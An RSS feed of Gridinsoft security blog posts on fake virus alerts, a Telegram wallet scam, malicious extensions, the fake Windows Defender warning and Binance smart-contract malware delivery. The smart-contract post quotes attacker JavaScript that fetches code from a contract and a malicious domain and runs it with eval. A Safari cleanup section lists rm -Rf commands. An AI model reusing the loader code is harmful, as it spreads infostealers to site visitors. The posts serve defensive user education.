Online Security Archives – Gridinsoft Blog Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe. Tue, 10 Sep 2024 17:21:16 +0000 en-US hourly 1 https://wordpress.org/?v=64244 200474804 Fake Virus Alert https://gridinsoft.com/blogs/fake-virus-alert-how-to-get-rid/ https://gridinsoft.com/blogs/fake-virus-alert-how-to-get-rid/#respond Tue, 10 Sep 2024 10:36:52 +0000 https://gridinsoft.com/blogs/?p=13030 Fake virus alerts are a nuisance; if you’re not careful, they can lead to a real malware injection. Scammers create fake virus pup-ups to deceive victims into clicking on the false virus warnings and inadvertently installing malware. So first, learn the telltale signs of a fake virus and how to deal with it. What is… Continue reading Fake Virus Alert

The post Fake Virus Alert appeared first on Gridinsoft Blog.

]]>
Fake virus alerts are a nuisance; if you’re not careful, they can lead to a real malware injection. Scammers create fake virus pup-ups to deceive victims into clicking on the false virus warnings and inadvertently installing malware. So first, learn the telltale signs of a fake virus and how to deal with it.

What is a fake virus alert?

Fake Virus Alert From Microsoft Defender
Fake Virus Alert From Microsoft Defender

A fake virus alert is a browser notification whose task is to mislead the user. It can appear not only in the browser but also in the system. That notification can be caused by rogue antivirus, adware, and simple website redirection.

Fake Virus Alert From Mcafee
Fake Virus Alert From Mcafee

Rogue antivirus is known as security software that is fraudulent and misleads users into believing there is a virus on their computer. This software aims to convince them to pay for a fake malware removal tool that blocks legitimate and safe apps it found in the system.

Fake security threats often appear on your computer screen as pop-ups in browsers that claim your computer is infected with a deadly virus. These pop-ups in turn signal you that you have adware on your device. Such warnings direct you to download a purported virus removal tool, which consequently may be the aforementioned rogue antivirus.

Rogue antivirus fake virus alerts
Example of Rogue antivirus

Redirections appear when you click through some less than trustworthy pages. Compromised sites, or ones whose administrators do not care who they’re referring to, may contain several such malicious links. They are not a sign of malware, but unfortunately, that reason fake virus notifications are quite rare.

However, there are quite a lot of instances where they serve malicious purposes. The spreading of such plugins is pretty easy, and it makes them very attractive. Common ways look like advertising pages and require “install a plugin to confirm that you are not a robot” or “a security advisory”. They have become a popular method of spreading infection, as they are embedded in the browser and are often ignored by weak anti-viruses. In addition, they are aimed at stealing user data, which is very much present in the browser.

Signs of fake virus alerts

Virus alerts can be convincing, but there are a few telltale signs that they’re fake. Understanding these telltale signs can assist you in avoiding phony pop-up alerts and clicking on dangerous links. Generally, trust your instincts: if something seems off, it’s probably wrong. These signs indicate that a fake virus is present:

  • Fake-sounding products: Fake virus warnings are typically straightforward. They often promote fraudulent products. Learning about the best antivirus software will make it simple to recognize fraudulent software.
  • High-frequency alerts: The sudden increase in warnings about the virus is alarming. However, this is a common tactic used by adware. The goal is to make you anxious enough to download their fraudulent product.
  • Bad grammar: A legitimate corporation takes time to refine its messaging and communications. Fake virus software scams will often have spelling and grammar errors and also apply strange text designs – like numerous “#” or “_” symbols across the text.
  • Vague wording: Unclear promises or vague descriptions are suspect. Reputable antivirus software will use straightforward language to describe its product and benefits.

The list of signs is not complete, as crooks have proven to be inventive enough to find new ideas on their banners. However, most of the time one or several symptoms among the names above will appear – and that should raise your suspicion.

Examples of fake virus alerts

A fake virus alert can have multiple forms. Understanding the following examples of virus warnings can assist you in recognizing scams before they have a chance to cause harm. These are some examples:

1. Malvertisements

Malvertising is hackers’ deceptive usage of legitimate advertising networks to infect ads that show up on websites you trust. These ads often claim your computer is infected with a virus and attempt to sell bogus antivirus programs. Pay attention only if you receive notifications about your computer being infected with malware.

Malvertisements
Example of malvertisements

2. Fake versions of real ads

Reputable businesses can fake Virus Alerts and deceptive Counterfeit ads. Fake phonies use dubious claims and exaggerated language full of fear. They also offer absurdly favorable terms.

3. System tray notifications

As opposed to common fake virus warnings, system tray notifications are rare. They appear as notifications in your system tray that inform you of a serious infection that requires immediate attention. Authentic notifications have a much more effective effect because they look more realistic. When you see one, make sure it’s not a fake before you choose to respond. By examining the language of a scam alert, you can determine if it’s real or fake. These fraudulent messages use emotional words to manipulate your emotions and trick you into rash decisions. They also typically have formatting issues or fonts that need to match up.

How to remove a fake virus alert?

Step 1. Remove push notifications

If you encounter a fake virus alert, the first step is to shut down your browser. A key combination like Alt+F4 or Command+Q (on macOS), will accomplish the task. However, if this is not possible, you can force your system preferences to close your browser if it’s sluggish. This can help prevent you from tapping on the infected pop-up which can lead to further problems. Then, open it back to start troubleshooting.

If you subscribe to push notifications from scam sites, you can remove them through the browser interface. Go to your browser settings, find notification settings and remove all the sites that are listed as ones that can send notifications. Reload the browser to apply the changes.

Step 2. Remove any suspicious extensions.

The extension is an application that enhances the functionality of the browser.

Google ChromeMozilla Firefox

Google Chrome

  1. Launch the Chrome browser.
  2. Click on the icon “Configure and Manage Google Chrome” ⇢ Additional Tools ⇢ Extensions.
  3. Click “Remove” next to the extension.

If you have an extension button on the browser toolbar, right-click it and select Remove from Chrome.

Mozilla Firefox

  1. Click the menu button, select Add-ons and Themes, and then click Extensions.
  2. Scroll through the extensions.
  3. Click on the … (three dots) icon for the extension you want to delete and select Delete.

Step 3. Reset browser settings

Resetting your browser settings is one of the first things you should do to eliminate the Windows Defender security warning scam. The following instructions tell you how to do this in different browsers:

Google ChromeMozilla FirefoxMicrosoft Edge

Google Chrome

  1. Tap on the three verticals … in the top right corner and Choose Settings. Choose Settings
  2. Choose Reset and Clean up and Restore settings to their original defaults. Choose Reset and Clean
  3. Tap Reset settings. Fake Virus Alert removal

Mozilla Firefox

  1. In the upper right corner tap the three-line icon and Choose Help. Firefox: Choose Help
  2. Choose More Troubleshooting Information. Firefox: Choose More Troubleshooting
  3. Choose Refresh Firefox… then Refresh Firefox. Firefox: Choose Refresh

Microsoft Edge

  1. Tap the three verticals. Microsoft Edge: Fake Virus Alert Removal
  2. Choose Settings. Microsoft Edge: Settings
  3. Tap Reset Settings, then Click Restore settings to their default values. Disable Fake Virus Alert in Edge

Step 4. Remove suspicious apps

Find and remove the suspicious app: Now go to settings and click on the ‘Apps’ section. Look for a list of current apps (you may need to select ‘App manager’ for a comprehensive list) and locate the malicious app. Open the app’s information and then select the option to uninstall. This should eliminate suspicious apps.

If you can’t find the suspicious program in the list of all programs on your device, you need to scan your device with an antivirus. You must remove this designation before you can discontinue the procedure. To accomplish this, go into your security settings and locate a section called Device Admin Apps with a title “Device Admin Apps”. Uncheck the app you want to remove and then deactivate the next step. You may now be able to delete the app.

Step 5. Scan your PC for viruses

If you examine your computer and can’t find any suspicious files, you should consider installing antivirus software — this is if you don’t already have it. You can utilize the software to search for malware that may be concealed within your computer. If the scan identifies a threat, it can attempt to remove it and prevent further damage to your device.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

The post Fake Virus Alert appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/fake-virus-alert-how-to-get-rid/feed/ 0 13030
New Telegram Scam Mimics Digital Wallets, Promotes Shady Apps https://gridinsoft.com/blogs/new-telegram-scam-digital-wallets/ https://gridinsoft.com/blogs/new-telegram-scam-digital-wallets/#respond Wed, 24 Jul 2024 22:55:37 +0000 https://gridinsoft.com/blogs/?p=25888 A new Telegram scam has emerged, leveraging bots functionality of the application and offering fake earning schemes. Scammers impersonate official bots of popular digital wallet brands, tricking users into investing their money into non-existent ventures. Further, they simply cut any communications, leaving users with no money and no promised returns. Telegram Bots Mimic Digital Wallet… Continue reading New Telegram Scam Mimics Digital Wallets, Promotes Shady Apps

The post New Telegram Scam Mimics Digital Wallets, Promotes Shady Apps appeared first on Gridinsoft Blog.

]]>
A new Telegram scam has emerged, leveraging bots functionality of the application and offering fake earning schemes. Scammers impersonate official bots of popular digital wallet brands, tricking users into investing their money into non-existent ventures. Further, they simply cut any communications, leaving users with no money and no promised returns.

Telegram Bots Mimic Digital Wallet Brands, Promote Questionable Apps

Recent research reveals a new scam scheme that combines Telegram bots and fake earning schemes. Scammers create bots in Telegram that pose as the official bot of a specific digital wallet, and offer easy earnings after completing the tasks. Victims are asked to register in a referral system, provide access to their digital wallet, and perform simple tasks. They usually about installing a strange app from the APK file, playing same strange games, watching ads and so on. Additionally, the scammers actively encourage the victims to share this scheme with friends and family, promising generous rewards for each referred friend.

Telegram bot screenshot
Telegram bot

This scam mainly spreads through social media, comments under videos on related topics, and in fake communities. At the moment it is a local threat targeting Indonesian users. However, there is a good chance it will eventually spread to other countries, as the scheme is extremely easy to replicate. Initially, frauds may allow the victim to withdraw funds – mostly at the very beginning, and with small sums. This is done to lull the victim into a false sense of security and to convince them that investing is safe. After investing, the victim is asked to perform the tasks for which they are promised rewards. However, ultimately, the scammers obtain the victim’s confidential information, funds and wallet data.

How Does This Scam Work?

The entire scam process can be roughly divided into stages. The first stage is gathering an audience, which aims to attract potential victims. Scammers use social media platforms like Facebook and TikTok for this purpose. Often, a link to the Telegram bot is placed under themed videos on TikTok, such as those about Hamster Combat tap-game. Though, more promotion ways may appear further, including ones in Telegram itself.

Tiktok comments screenshot
Comments on the TikTok

Retaining The Victim

The next stage is pushing the victim into continuous participation in the scam. As mentioned earlier, frauds use Telegram bots that impersonate well-known digital wallet brands. Main part of all this is built on two things: completing tasks and introducing new people through referral links. Through the bot messages, they motivate the user to bring in as many new users as possible and do the tasks in order to increase the reward.

Moreover, there are specific minimum requirements that, if not met, leave the user without any reward. For example, the user receives 10,000 Indonesian Rupiah (~62¢) for each referred friend. However, the minimum number of referred users is 15, and the minimum withdrawal amount is 100,000 Indonesian Rupiah (~$6.15). Also, the victim should be subscribed to the Telegram channel led by scammers, otherwise they will not be rewarded at all.

Main Act of the Fraud

After attaching the victim to the scam, the bot starts sending them the tasks – installing certain programs from shady websites (as .APK files), browsing through pages that appear as phishing, and watching ads. There were legitimate earning schemes in the past that offered a certain pay for such actions, thus it does not look like a complete ripoff at a glance. Nonetheless, these older schemes never offered installing gambling apps, some dodgy games that collect a lot of user data, or, moreover, get to phishing websites.

Eventually, when the reward is getting closer to the withdrawal threshold, the bot simply stops communicating with the victim. At first, the tasks appear slower and slower, and at some point you will just see the message saying “no tasks available”. This is, in fact, the culmination of the scam.

Fake Community

To enhance their credibility, scammers have created groups on Telegram and WhatsApp where they post news and interact with users. Often, to join such a group, the victim must make an initial deposit. However, in some cases, scammers may add an interested user without requiring a deposit. In these groups, more experienced “investors” share stories and screenshots of their “earnings,” thereby increasing the trust of new victims.

Despite these Telegram bots and communities associating themselves with well-known wallets, they obviously have no real connection to them. As a result, after some time, users are left with nothing. When they attempt to withdraw funds, they are directed to customer support, which promises that everything will be done soon. Additionally, besides losing money, victims provide scammers with confidential information that can later be reused in other scams.

Another side of that fraud that is not that obvious is the outcome of the installation of shady APK files. While Google Play is not the most reliable app source, it will still stop the most blatant malware. But when you side-load an APK file, any checks are only on you. And that is the main problem here: victims are simply blinded by the rewards, and consequently pay no attention to what they install. This may – and will – result in data loss and identity theft.

Why Is This So Popular?

Although similar scams have existed before, they are currently experiencing a significant boom. There are several reasons, including widespread digitalization and the popularity of digital assets and tokens. For example, apps like “Hamster Combat” and similar ones attract users who are eager for easy earnings. Scammers exploit this trend by creating fake referral programs and investment schemes to lure users and gain access to their funds.

The second reason is the lack of sufficient moderation on social media platforms. As mentioned earlier, the primary source of this scam is social networks, where the audience is often not technically savvy. Consequently, users frequently encounter ads and comments containing links to fraudulent websites and apps. Although artificial intelligence is increasingly being used in moderation processes, scammers also use AI to bypass these measures. As a result, naive users fall victim to this arms race.

New Telegram Scam Mimics Digital Wallets, Promotes Shady Apps

The post New Telegram Scam Mimics Digital Wallets, Promotes Shady Apps appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/new-telegram-scam-digital-wallets/feed/ 0 25888
Browser Extensions: Are They Safe? https://gridinsoft.com/blogs/browser-extensions-are-they-safe/ https://gridinsoft.com/blogs/browser-extensions-are-they-safe/#respond Sun, 07 Jul 2024 13:57:36 +0000 https://blog.gridinsoft.com/?p=2516 Browser extensions are convenient little utilities that may adjust browsing experience and make it more comfortable for you personally. However, such a convenient shell – an applet to the legitimate program – could not have been ignored by malicious actors. In this post, I will uncover about malicious browser extensions, their nature and potential harm.… Continue reading Browser Extensions: Are They Safe?

The post Browser Extensions: Are They Safe? appeared first on Gridinsoft Blog.

]]>
Browser extensions are convenient little utilities that may adjust browsing experience and make it more comfortable for you personally. However, such a convenient shell – an applet to the legitimate program – could not have been ignored by malicious actors. In this post, I will uncover about malicious browser extensions, their nature and potential harm.

Can extensions be malicious?

Yes, extensions can be malicious, but the harm they can cause is quite specific. In terms of severity, a browser extension is not on par with full-fledged malware. Since extensions cannot go beyond the environment of a browser, they cannot infect the system, modify or delete system files, or directly manipulate the operating system (except for cases with vulnerabilities). However, some extensions can collect personal data, such as browsing history, passwords, and other confidential information, and transmit it to third parties without your consent. This makes them close to spyware and infostealers.

Depending on the type of extension, they can act differently and thus have distinct malicious potential: For example, some can open pop-up ads, redirect users to phishing sites or inject ads into websites where they are initially not present. Some extensions may contain malicious code that can initiate the download of other malicious programs. They can also change your browser settings without your knowledge, alter your homepage or search engine.

It is worth noting that a malicious browser extension these days is a rare find, unless you source them from official websites. Browser extensions are usually distributed through extension stores – platforms that have moderation and requirements, although they are not always effective for stopping malicious stuff. Should their system detect malicious activity or get a well-backed feedback on malignant behavior, the extension’s listing will cease to exist.

Main ways for dodgy extensions to spread are far away from the common routes of the Internet. Usually, they appear from a redirection made by a shady website that trades its traffic to random traffic brokers online. Upon redirection, the user will see an offer to install a “recommended extension” – to enhance security or to display the content. Sure enough, neither of these really happen after the installation.

Extension installation popup
Useless browser extension tries to install.

Browser Hijacker

A browser hijacker is perhaps the most common type of malicious extension. Once installed, this extension changes your homepage and search engine. Even if the user navigates to google.com and performs a search, the extension redirects the query to its search engine. It also adds a special token to each search query, which modifies the search results. In the end, instead of relevant results, the user receives sponsored links that may not even match the query.

The primary risk of such extensions lies in the collection of personal information. The redirection that happens in the process throws the user through a selection of data broker sites, and each of them gathers whatever data they want. Aforementioned alteration of search results can casually throw the user to a phishing page. In some cases, this can result in the download of malicious software.

Adware

Adware extensions, as the name suggests, add advertisements to all the websites a user visits. Typically, these extensions disguise themselves as something useful or basic, such as extensions for finding discounts and promo codes. Notably, similar functionality is already present in Microsoft Edge. In practice, these extensions are useless; instead, they bombard the user with ads. Considering that adware does not do anything beyond the actions I’ve just mentioned, malicious browser extensions may be just an adware specimen.

Typical result of activity of adware browser extensions is hard to ignore. The browser starts to run slowly; clicking on any element on a page opens multiple tabs with ads, some of which may be malicious. Certain sites can automatically initiate the download of malicious software. Overall, the extension can seriously degrade the user experience and pose a threat to privacy.

Fake Cryptocurrency Wallet Extension

Fake cryptocurrency wallet extensions pose as legitimate crypto wallets, but their goal is to steal users’ credentials and funds. As I mentioned earlier, moderation in app stores is far from perfect, and sometimes malicious actors manage to place harmful extensions in official extension stores. These extensions may be disguised as popular wallets but have no actual affiliation with them.

When a user enters their credentials, such as private keys, mnemonic phrases, or passwords, the extension transmits this information to the malicious actors. This info allows the attackers to access the user’s real cryptocurrency wallets. Once they have access to the account, the attackers can transfer the funds to their accounts, leading to a complete loss of cryptocurrency for the user.

How to Stay Safe?

Malicious browser extensions are a type of threat you should not underestimate the dangers of. I have a few recommendations that can help you minimize the risks associated with malicious extensions. Firstly, try to avoid installing unnecessary extensions. I would recommend avoiding extensions from unverified sources altogether.

While most of us tend to click “next” to speed up the installation process when installing an extension from a store, I suggest paying attention to the developer and reading the reviews. Keep an eye on your installed extensions and promptly remove any that are unnecessary. Pay special attention when installing extensions related to cryptocurrency wallets. And finally, consider using decent anti-malware software that will notify you about the malicious activity that comes from such an extension.

Browser Extensions: Are They Safe?

The post Browser Extensions: Are They Safe? appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/browser-extensions-are-they-safe/feed/ 0 2516
Windows Defender Security Warning https://gridinsoft.com/blogs/windows-defender-security-warning-scam-how-to-remove/ https://gridinsoft.com/blogs/windows-defender-security-warning-scam-how-to-remove/#comments Tue, 02 Jul 2024 09:14:36 +0000 https://gridinsoft.com/blogs/?p=12958 Have you ever encountered a Windows Defender security warning pop-up while browsing? This type of malicious activity is designed to trick you into contacting scammers. Fortunately, you can quickly get rid of it. Here, we will explain how to remove this scam and protect yourself from other viruses. What is the Windows Defender Security Warning?… Continue reading Windows Defender Security Warning

The post Windows Defender Security Warning appeared first on Gridinsoft Blog.

]]>
Have you ever encountered a Windows Defender security warning pop-up while browsing? This type of malicious activity is designed to trick you into contacting scammers. Fortunately, you can quickly get rid of it. Here, we will explain how to remove this scam and protect yourself from other viruses.

What is the Windows Defender Security Warning?

This warning is the result of scareware or a phishing scam. Its purpose is to redirect you to a webpage that visually resembles the official Microsoft website. However, the URL does not match the official site. The page may display a message claiming that your computer is infected with malware and that you need to contact a support agent by phone to fix the problem.

Fake Windows Defender Security Warning
Windows Defender Security Warning scam example. Red flags are highlighted in the picture.

Unfortunately, the notification looks like a legitimate Windows message, making it especially dangerous – many users may not even attempt to verify i= on Google. Scammers commonly make the pop-up as convincing as possible so that people don’t suspect anything is wrong. The provided phone number will likely connect you to a fraudulent call center. The agent may try to get you to install malware to infect your computer, steal your personal information, or demand money for fake services.

Why is the Windows Defender Security Warning False?

At first glance, you might mistake this for a legitimate warning from Windows Defender. However, if you’re familiar with Windows Defender, you’ll notice differences from a genuine notification. Therefore, please do not call the phone number provided in the window because it is not a real alert. Here’s why:

  • It’s not the Windows Defender interface. Windows Defender, also known as Windows Security, is a built-in Windows application with a different interface. It will never display a browser pop-up or webpage; it uses system notifications instead.
  • Strange text and typos. A banner or page showing a Microsoft Defender alert often contains strange text designs and grammatical and stylistic errors, which sharply contrast with the short and informative Defender notifications.
  • Microsoft never provides contact numbers for users. Users can contact Microsoft support through the “Get Help” application if they encounter problems.

This Windows Defender security alert is flawed in both format and content. It’s often a low-level phishing scam aiming to sell a rogue antivirus service, which can harm your computer. In some cases, you might not be able to close the alert or switch to other applications.

Causes of the Windows Defender Security Warning

There are several reasons why you might see a Windows Defender security warning. Here are the most common ones:

  • You clicked on an ad that redirected you to a fake site.
  • You visited a hacked website that redirected you to a fraudulent page.
  • You have a malicious program installed on your device, often a result of adware activity.

There are also many other ways you could be exposed to fraud, depending on various factors, such as the external devices you share with others. Simply closing the window may not solve the problem, especially if adware is causing it. The pop-up message may appear every time you open your browser.

How to Remove the Windows Defender Security Warning

Since the Windows Defender security warning appears in your browser, most actions to get rid of it are related to your browser. These steps can help resolve the issue of Windows Defender security warning pop-ups:

  • Force close and reopen your browser.
  • If the problem with redirecting to a fraudulent page persists, reset your browser (instructions below) or reinstall the browser completely.
  • If this continues, you may have adware or a PUP (potentially unwanted program) installed on your computer, and you need to remove it.

If you’re unsure which installed application is causing the pop-up notifications, install antivirus software to detect and remove the infection from your computer.

How to Clear the Browser from the Windows Defender Security Warning

Resetting your browser settings is one of the first steps to eliminate the Windows Defender security warning scam. Here are the instructions for different browsers:

Remove the Windows Defender Scam from Chrome

  1. Click on the three vertical in the top right corner and Select Settings.
    How to open Chrome settings
  2. Select Reset and Clean up and Restore settings to their originals defaults.
    Restore settings button
  3. Click Reset settings.
    Reset settings button for fix Windows Defender Security Warning

Remove the Windows Defender Scam from Firefox

  1. Click the three-line icon in the upper right corner and select Help
    How to find Firefox reset settings
  2. Select More Troubleshooting Information
    Next step to Firefox reset
  3. Select Refresh Firefox… then Refresh Firefox
    Refresh Firefox can help to remove Windows Defender Security Warning

Remove the Windows Defender Scam from Microsoft Edge

  1. Press the three dots
    How to reset Edge settings. Step 1
  2. Select Settings
    How to reset Edge settings. Step 2 - Settings
  3. Click Reset Settings, then Click Restore settings to their default vaues.
    Restore Edge settings for solve Windows Defender Security Warning
  4. Remove the Windows Defender Scam from Safari

    1. Open the terminal (press ⌘ Command + Spacebar to open the spotlight, type “terminal” and press “Enter”)
    2. Enter these commands one at a time. Execute each command by pressing “Enter” after copying it into the terminal:

    3. rm -Rf ~/Library/Caches/Metadata/Safari;
      rm -Rf ~/Library/Caches/com.apple.Safari;
      rm -Rf ~/Library/Caches/com.apple.WebKit.PluginProcess;
      rm -Rf ~/Library/Preferences/Apple\ -\ Safari\ -\ Safari\ Extensions\ Gallery
      rm -Rf ~/Library/Preferences/com.apple.Safari.LSSharedFileList.plist;
      rm -Rf ~/Library/Preferences/com.apple.Safari.RSS.plist;
      rm -Rf ~/Library/Preferences/com.apple.Safari.plist;
      rm -Rf ~/Library/Preferences/com.apple.WebFoundation.plist;
      rm -Rf ~/Library/Preferences/com.apple.WebKit.PluginHost.plist;
      rm -Rf ~/Library/Preferences/com.apple.WebKit.PluginProcess.plist;
      rm -Rf ~/Library/PubSub/Database;
      rm -Rf ~/Library/Safari/*;
      rm -Rf ~/Library/Safari/Bookmarks.plist;
      rm -Rf ~/Library/Saved\ Application\ State/com.apple.Safari.savedState;

    What to Do if the Problem Persists?

    If you have followed all the steps above and still see this warning every time you use a web browser, it is a clear sign that malware is still on your computer. You can use professional antimalware software such as GridinSoft Anti-Malware to scan your computer and remove any viruses or malware found. After taking such drastic measures, the antimalware software will remove and neutralize more dangerous cyber threats that could cause severe damage to your files.

    GridinSoft Anti-Malware main screen

    Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

    After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

    Scan results screen

    Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

    Removal finished

    How to Avoid Scams like the Windows Defender Security Warning

    As mentioned earlier, the Windows Defender security warning scam is not the only threat you may encounter on your computer. There is much more severe malware on the Internet, and as a prudent user, you should take every precaution to avoid them. Here are some basic tips:

    • Ensure your OS and apps are up to date
    • Only download apps from official websites
    • Avoid clicking on random links without knowing where they will take you
    • Don’t download suspicious apps
    • Do not open attachments in suspicious emails
    • Use an ad blocker to block malicious ads
    • Use advanced antivirus software

    Your computer should now be clean and free of Windows Defender scams. To prevent this from happening again, practice good online hygiene to protect yourself from fraud. Perform regular scans and use malware protection to stop threats before they happen.

    The post Windows Defender Security Warning appeared first on Gridinsoft Blog.

    ]]> https://gridinsoft.com/blogs/windows-defender-security-warning-scam-how-to-remove/feed/ 2 12958 Binance Smart Contracts Blockchain Abused in Malware Spreading https://gridinsoft.com/blogs/binance-smart-contracts-abused-malware-spreading/ https://gridinsoft.com/blogs/binance-smart-contracts-abused-malware-spreading/#respond Tue, 25 Jun 2024 10:25:24 +0000 https://gridinsoft.com/blogs/?p=23010 Cybercriminals appear to exploit Binance smart contracts as intermediary C2, preferring them over more classic hostings for them being impossible to take down. It is currently used to deploy infostealers, but potential application for such malignant purposes allows for working with pretty much any malware. Cybercriminals Use BSCs As C2 Infrastructure A new technique, coined… Continue reading Binance Smart Contracts Blockchain Abused in Malware Spreading

    The post Binance Smart Contracts Blockchain Abused in Malware Spreading appeared first on Gridinsoft Blog.

    ]]>
    Cybercriminals appear to exploit Binance smart contracts as intermediary C2, preferring them over more classic hostings for them being impossible to take down. It is currently used to deploy infostealers, but potential application for such malignant purposes allows for working with pretty much any malware.

    Cybercriminals Use BSCs As C2 Infrastructure

    A new technique, coined EtherHiding, was described over half a year ago, in October 2023. Analysts noticed the shift in the networking patterns of a now-old scheme that tricks users into installing malware disguised as browser updates. Instead of pulling the malicious code from Cloudflare Workers, they now direct their request towards smart contracts on Binance.

    Smart contracts, in their essence, are code elements that are executed when certain conditions are met, in this case – a correct request is sent. This makes them similar to Cloudflare Workers, which effectively allowed frauds to use genuine Cloudflare servers to host malicious code delivery. The only difference here though is that smart contracts are hosted on a blockchain, which makes them nearly impossible to take down. And this is probably why cybercriminals started to pay them so much attention, aside from the fact these contracts are dirt cheap. But more on that later.

    How Malware Spreads via Binance Smart Contracts?

    Attack chain begins with compromising a website; hackers usually target WordPress sites, due to the numerous vulnerabilities in WP as site engine and the selection of vulnerabilities in popular plugins. After compromising the website, hackers set a specific script that communicates with Binance web API.

    async function load() {
    let provider = new ethers.providers.JsonRpcProvider("https://bsc-dataseed1.binance.org/"),
    signer = provider.getSigner(),
    address = "0x7f36D9292e7c70A204faCC2d255475A861487c60",
    ABI = [
    { inputs: [{ internalType: "string", .......},
    { inputs: [], name: "get", ......},
    { inputs: [], name: "link", ....... },
    ],
    contract = new ethers.Contract(address, ABI, provider),
    link = await contract.get();
    eval(atob(link));
    }
    window.onload = load;

    In between these operations, attackers create a new smart contract, and add the malicious code to it through the update function of the contract. This locks the entire scheme in the “ready-to-fire” position.

    BCS malware delivery scheme

    After entering the compromised site, the user triggers the mechanism, making the website send the get() request to the associated smart contract. The response contains a binary code string; through using the eval() function, hackers make the user’s browser execute this code. This is what defaces the website and causes the “update browser” banner to appear.

    Experienced users may feel something fishy happening, as browsers never ask for the update in such a manner, but the majority of people will take it for granted. Clicking the “Update …” button on that image will execute the script grabbed from the smart contract and download the final payload. Cybercriminals typically use a bunch of one-day websites that return the payload. At the moment, malware like Lumma Stealer, Redline and Vidar use this scheme the most.

    const get_k_script = () => {
    let e = new XMLHttpRequest();
    return e.open("GET", "https://921hapudyqwdvy[.]com/vvmd54/", !1), e.send(null), e.responseText;
    };
    eval(get_k_script());

    Is this new practice dangerous?

    It is hard to estimate the dangers that come from this trick, but it has several major benefits compared to all other methods adversaries used in the past.

    The most noticeable among them is that, as I said, Binance Smart Contracts are nearly impossible to take down. Cybercriminals are ready to pay hefty sums for running their infrastructure on “bulletproof hostings”. That is a common name for ones that have little to no downtimes and do not cooperate with law enforcement. There are a few other parameters, but BSCs fulfill them all at the same time nonetheless. Being based on the blockchain of a huge crypto exchange, it is barely susceptible to DDoS attacks. And it is anonymous – at least, operating smart contracts does not require any personal data, and they does not store any info about the creator.

    One more benefit, that beats even the “classic” bulletproof hostings, is the price. Binance takes pay for creating, modifying and interacting with the contract. But threat actors designed their operations in a way to minimize payments. All they pay for is the creation fee, and then a payment for each update, but the sum is so miserable ($0.2 – $0.6) that the attackers can modify things almost daily.

    Overall, this new modus operandi may bring dramatic changes to how malware is spreading nowadays. Series of recent disruptions of operations made it clear that the previous model does not have a promising future, to say the least. With the abuse of smart contracts, regardless of the blockchain they’re based off, the malware spreading may take a new sharp turn up.

    Protecting Against Malicious Binance Smart Contracts

    Despite the scheme with malicious Binance contracts looks quite hard to disrupt, the overall attack consists of numerous steps. And that is where a proper anti-malware software will be able to intercept and stop the malware. GridinSoft Anti-Malware will grant you with exceptional protection against both network threats and deeply-disguised malware on the disk.

    Binance Smart Contracts Blockchain Abused in Malware Spreading

    The post Binance Smart Contracts Blockchain Abused in Malware Spreading appeared first on Gridinsoft Blog.

    ]]>
    https://gridinsoft.com/blogs/binance-smart-contracts-abused-malware-spreading/feed/ 0 23010
    This Message Seems Dangerous https://gridinsoft.com/blogs/this-message-seems-dangerous/ https://gridinsoft.com/blogs/this-message-seems-dangerous/#respond Wed, 19 Jun 2024 19:46:42 +0000 https://gridinsoft.com/blogs/?p=10164 Sometimes, Gmail displays a “This Message Seems Dangerous” notification alerting the user that the email seems dangerous, which is obvious. While the banner usually contains more detailed information, this often happens when other users report similar types of emails to Google as “phishing” emails. In other cases, the banner may contain a description like this:… Continue reading This Message Seems Dangerous

    The post This Message Seems Dangerous appeared first on Gridinsoft Blog.

    ]]>
    Sometimes, Gmail displays a “This Message Seems Dangerous” notification alerting the user that the email seems dangerous, which is obvious. While the banner usually contains more detailed information, this often happens when other users report similar types of emails to Google as “phishing” emails. In other cases, the banner may contain a description like this: “Gmail could not confirm that it actually came from [domain]”, “This may be a spoofed message”, or “[Name] has never sent you messages using this email address”. Let’s have a look at why this error appears and how to prevent it, for both senders and the receiving end.

    How to Fix “Be Careful With This Message” Error

    Gmail does not disclose the logic behind its filters and spam detection to prevent hackers from bypassing Google’s filters. When a user sends or receives an email, it goes through Google’s spam filters before reaching the inbox. It’s a kind of Blackbox that can’t be turned off. If Google deems the email suspicious, it will either be flagged with a banner. However, this doesn’t always mean a guaranteed threat; sometimes, filters can flag safe, clean emails.

    If you receive an email and see a “This message seems dangerous” message, try going through the following steps. I begin with the troubleshooting steps for:

    Check the Sender

    Before trusting an email, it’s crucial to verify the sender. Sometimes, hackers can disguise their email to appear as if it’s from a legitimate source. Examine the email address for spelling mistakes or characters that closely resemble others, such as a numeric “0” instead of a capital “O” or a lowercase “l” instead of a capital “I”.

    Hackers can spoof an email to make it look like it’s from a trusted source, like Amazon. However, if you look closely at the sender’s email address, you might find that it’s something like Ama.z0n.full@hotmail.com, which is not a legitimate Amazon email address.

    Today, scammers are using artificial intelligence to write phishing emails, virtually eliminating errors in the text or red flags. Nevertheless, while you open the email, look for suspicious signs in the email’s body content, such as misspelled names and other spelling mistakes. Remember: Banks, social networking sites, and government institutions never contact you for sensitive information via email.

    Is It a Trusted Sender?

    Next, there’s one thing you can review to be completely certain about the “This message seems dangerous” notification”: check whether the sender is really someone you know. Google offers a convenient way to do this. Select Compose in the upper left corner of the Gmail window.

    What to Do?
    Select “Compose”

    Copy the suspicious email address to the “To” field in the new email panel.

    Message Seems Dangerous
    This is a trusted address

    If the address matches a trusted sender with whom you’ve corresponded, their email will appear in the drop-down list. However, if nothing occurs or the emails in the drop-down list don’t match, you’ve probably received a fraudulent email disguised as one from a trusted sender.

